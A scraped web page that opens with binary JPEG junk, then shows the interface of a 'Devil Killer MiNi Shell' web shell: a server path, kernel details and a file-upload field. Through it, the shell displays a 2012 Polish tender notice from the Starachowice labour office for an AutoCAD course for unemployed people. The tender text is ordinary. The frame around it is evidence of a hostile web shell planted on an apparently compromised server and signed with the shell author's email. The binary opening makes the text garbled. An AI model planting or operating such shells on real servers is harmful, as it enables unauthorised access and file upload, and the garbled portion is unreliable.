JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121003/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121003/377574-N-2012.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Obsługa programu AUTOCAD. Znak sprawy ZP/20/2012.</b><br>
<b>Numer ogłoszenia: 377574 - 2012; data zamieszczenia: 03.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Obsługa programu AUTOCAD. Znak sprawy ZP/20/2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa z zakresu szkolenia. Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Obsługa programu AUTOCAD. Znak sprawy ZP/20/2012.
Kod zgodnie ze słownikiem CPV 80530000-8. 
-	Celem szkolenia jest uzyskanie nowych umiejętności i kwalifikacji przez uczestników szkolenia.
-	Proponowana liczba godz.: 40 godzin dla każdego uczestnika szkolenia.
-	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia odbywały się codziennie od poniedziałku do piątku. W przypadkach uzasadnionych dopuszcza się odbywanie szkolenia w soboty. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć 
w niedzielę oraz w dni ustawowo wolne od pracy.
-	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. Plan nauczania powinien obejmować przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
-     Miejsce realizacji szkolenia:  miasto Starachowice lub miejscowość w promieniu do 60 km od 
      Starachowic, 
-    W przypadku gdy, szkolenie będzie realizowane poza miastem Starachowice, koszty transportu
     (dojazdu) uczestników szkolenia pokrywa Wykonawca.
-    Wykonawca zapewni odpowiednią kadrę szkoleniową oraz opracuje szczegółowy harmonogram 
     szkolenia.
-   Wykonawca zapewni opiekuna sprawującego nadzór nad grupą szkoleniową oraz czuwającą nad    
    prawidłową realizacją szkolenia  
-	Wykonawca zapewni niezbędny sprzęt dla prawidłowego przeprowadzenia szkolenia.
-	Wykonawca zapewni warunki szkolenia zgodne z przepisami bezpieczeństwa i higieny pracy. 
-	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały piśmienne (zeszyt, długopis, itp.), materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia) oraz szczegółowy harmonogram szkolenia. 
-	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia z wyjątkiem osób posiadających z tytułu uczestnictwa w szkoleniu prawo do stypendium szkoleniowego.
-    Ewentualny egzamin  zorganizuje i opłaci Wykonawca zamówienia. 
-    Wykonawca wyda dokument (zaświadczenie, dyplom, uprawnienie), potwierdzający ukończenie 
      szkolenia  zawierający numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, 
     a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji   
     szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, 
     miejsce i datę wydania zaświadczenia lub innego dokumentu  potwierdzającego ukończenie 
     szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby 
     upoważnionej przez instytucję szkoleniową  przeprowadzającą szkolenie.
-    Zamawiający przewiduje możliwość zmiany np: terminu wykonania zamówienia (wcześniejsze, 
     późniejsze wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego 
     rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia. Zamawiający dokona zapłaty 
     za liczbę osób faktycznie rozpoczynających szkolenie (tj. iloczyn liczby osób rozpoczynających 
     szkolenie i ceny jednostkowej).
-   Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
    określonej w opisie przedmiotu zamówienia. 
-   Zamawiający przewiduje możliwość zmiany przez Wykonawcę składu komisji egzaminacyjnej, osoby sprawującej nadzór nad prawidłową realizacją szkolenia, kadry dydaktycznej mającej prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. 
- Zamawiający przewiduje możliwość zmiany przez Wykonawcę sprzętu technicznego 
    wykorzystywanego podczas przeprowadzania szkolenia określonego załączniku nr 3 do SIWZ 
    oraz w ofercie jednostki  szkolącej - załącznik nr 7 do SIWZ pod warunkiem, że wymieniony 
    sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. Zmiana ta wymaga 
    akceptacji Zamawiającego.
-   Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania szkolenia pod 
    warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę będzie mieścić się w tej 
    samej miejscowości, którą wskazał Wykonawca w złożonej ofercie. Zmiana ta wymaga akceptacji 
    Zamawiającego. W przypadku zawarcia umowy zmiana ta wymaga jej aneksowania 
-   Zamawiający przewiduje możliwość zmiany osób wskazanych w umowie, upoważnionych do 
    kontaktów.   
-   Wykonawca zapewni serwis kawowy dla uczestników szkolenia.   
-  W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu      
    zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.
- Przed podpisaniem umowy Wykonawca w terminie 5 dni od dnia pozyskania informacji
   o wyborze najkorzystniejszej oferty, jest zobowiązany dostarczyć Zamawiającemu: 
   a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do   
        ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem 
        terminu składania ofert. Dokument można złożyć w formie oryginału lub kopii poświadczonej za 
       zgodność z oryginałem.
   b) wzór ankiety dla uczestników szkolenia,
   c) wzór dokumentacji potwierdzającej ukończenie szkolenia tj. wzór zaświadczenia, dyplomu, 
       uprawnienia itp.
   d)  harmonogram zajęć,
   e)  szczegółowy program szkolenia w szczególności zawierający:
        - nazwę i zakres szkolenia,
        - czas trwania i sposób organizacji szkolenia,
        - wymagania wstępne dla uczestników szkolenia,
        - cele szkolenia,
        -  plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem 
          w miarę potrzeby, części teoretycznej i części praktycznej,
       - opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
       - wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
       - przewidziane sprawdziany i egzaminy.   
Program szkolenia powinien być sporządzony z wykorzystaniem standardów kwalifikacji 
i modułowych programów szkoleń zawodowych, o ile są one dostępne w bazach danych prowadzonych przez ministra.
Nie dostarczenie przez Wykonawcę w/w dokumentów, będzie skutkowała odstąpieniem przez Zamawiającego od podpisania umowy. 

W przypadku osób działających jako pełnomocnicy, do oferty należy dołączyć pełnomocnictwo 
w formie oryginału lub formie poświadczonej notarialnie kopii.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
  - załącznik nr 1 do SIWZ,   
- Na podstawie złożonego oświadczenia Wykonawcy o posiadaniu wpisu do rejestru instytucji 
   szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę 
   instytucji szkoleniowej /przepisy ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach 
   rynku pracy art. 20 ust.1/- załącznik nr 2 do SIWZ.
Zamawiający dokona sprawdzenia w Rejestrze Instytucji Szkoleniowych czy instytucja szkoleniowa posiada w/w wpis oraz czy kontynuuje swoją działalność w bieżącym roku.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością w okresie 
   ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
   krótszy- w tym okresie przynajmniej jednego szkolenia o tej samej tematyce co przedmiot  
   zamówienia.
-  Na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą starannością 
   przynajmniej jednego szkolenia o tej samej tematyce co przedmiot zamówienia. Dokumentem 
   potwierdzającym przeprowadzenie szkolenia może być dokument, który jednoznacznie potwierdzi 
   należyte wykonanie usługi w przedmiocie zamówienia np. list referencyjny, protokół odbioru usługi 
   szkoleniowej itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie  
   zamówienia przeprowadził szkolenie  o tej samej tematyce co przedmiot zamówienia. Dokument ten 
   musi zawierać termin jego przeprowadzenia.
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
  - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
  - załącznik nr 1 do SIWZ,    
-  Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym 
   zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 3 do SIWZ. 
W przypadku gdy w miejscu odbywania szkolenia jednostka szkoląca nie posiada własnej bazy szkoleniowej do przeprowadzenia szkolenia na spełnienie tego warunku należy dołączyć dodatkowo np: zobowiązanie do współpracy, umowę przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej, w której winny zostać określone: warunki lokalowe, wyposażenie sal do przeprowadzenia zajęć, pomoce dydaktyczne oraz sprzęt techniczny, który zostanie wykorzystywany do realizacji tego zamówienia.  W przypadku braku tych zapisów w w/w dokumentach, te informacje proszę zawrzeć  w załączniku nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
  - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania   
   przedmiotu zamówienia - załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację przedmiotu 
   zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem  podatków oraz o niezaleganiu 
   z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, ewentualnie oświadczenie 
   o uzyskaniu przewidzianym prawem zwolnieniu, odroczeniu lub rozłożeniu na raty zaległych 
   płatności - załącznik nr 5 do SIWZ, 
   lub
- Na podstawie aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz 
    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
    Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, 
    opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał 
    przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
    wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 
    miesiące przed upływem terminu składania ofert. 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt 
    stanowi załącznik Nr 8 do niniejszej specyfikacji.
2. Zamawiający przewiduje możliwość zmiany np: terminu wykonania zamówienia (wcześniejsze, 
    późniejsze wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego 
    rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia Zamawiający dokona zapłaty za 
   liczbę osób faktycznie rozpoczynającą szkolenie (tj. iloczyn liczby osób rozpoczynających szkolenie 
   i ceny jednostkowej).
3. Zamawiający przewiduje możliwość zmiany przez Wykonawcę składu komisji egzaminacyjnej, 
    osoby sprawującej nadzór nad prawidłową realizacją szkolenia, kadry dydaktycznej mającej 
    prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
    której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
    zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
    kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
    Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  przez 
    Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. 
4. Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania szkolenia pod 
    warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę będzie mieścić się w tej 
    samej miejscowości, którą wskazał Wykonawca w złożonej ofercie. Zmiana ta wymaga akceptacji 
    Zamawiającego. W przypadku zawarcia umowy zmiana ta wymaga jej aneksowania .
5.Zamawiający przewiduje możliwość zmiany przez Wykonawcę sprzętu technicznego 
    wykorzystywanego podczas przeprowadzania szkolenia określonego załączniku nr 3 do SIWZ 
    oraz w ofercie jednostki szkolącej - załącznik nr 7 do SIWZ pod warunkiem, że wymieniony 
   sprzęt znajdzie zastosowanie podczas przeprowadzania tego szkolenia. Zmiana ta wymaga 
   akceptacji Zamawiającego.
6. Zamawiający przewiduje możliwość zmiany osób wskazanych w umowie, upoważnionych do 
    kontaktów.   
7. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu 
    zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
8. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
    okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można 
    było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 
    dni od powzięcia wiadomości o tych okolicznościach.
    W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
    wykonania części umowy.

UWAGA!
Przed podpisaniem umowy Wykonawca w terminie 5 dni od dnia pozyskania informacji o wyborze najkorzystniejszej oferty, jest zobowiązany dostarczyć Zamawiającemu: 
  a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
        ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem 
        terminu składania ofert. Dokument można złożyć w formie oryginału lub kopii poświadczonej za 
       zgodność z oryginałem.
  b) wzór ankiety dla uczestników szkolenia,
  c) wzór dokumentacji potwierdzającej ukończenie szkolenia tj. wzór zaświadczenia, dyplomu, 
      uprawnienia itp.
  d)  harmonogram zajęć,
  e) szczegółowy program szkolenia w szczególności zawierający:
    - nazwę i zakres szkolenia,
    - czas trwania i sposób organizacji szkolenia,
    - wymagania wstępne dla uczestników szkolenia,
   - cele szkolenia,
   - plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem 
      w miarę potrzeby, części teoretycznej i części praktycznej,
   - opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
   - wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
   - przewidziane sprawdziany i egzaminy.   
Program szkolenia powinien być sporządzony z wykorzystaniem standardów kwalifikacji
i modułowych programów szkoleń zawodowych, o ile są one dostępne w bazach danych prowadzonych przez ministra.
Nie dostarczenie przez Wykonawcę w/w dokumentów, będzie skutkowała odstąpieniem przez Zamawiającego od podpisania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl     
Zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 12:00, miejsce: Siedziba Zamawiającego : 
     Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -  Zamawiający nie dopuszcza składania ofert częściowych.
-  Zamawiający nie dopuszcza składania ofert wariantowych.
-  Zamawiający nie przewiduje zamówień uzupełniających.
-  Zamawiający nie przewiduje zawarcia umowy ramowej.
-  Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-  Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
-  Otwarcie ofert nastąpi w dniu 11-10-2012 r. o godz. 12:10 w siedzibie 
     Zamawiającego w pokoju  nr 208. Otwarcie ofert jest jawne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com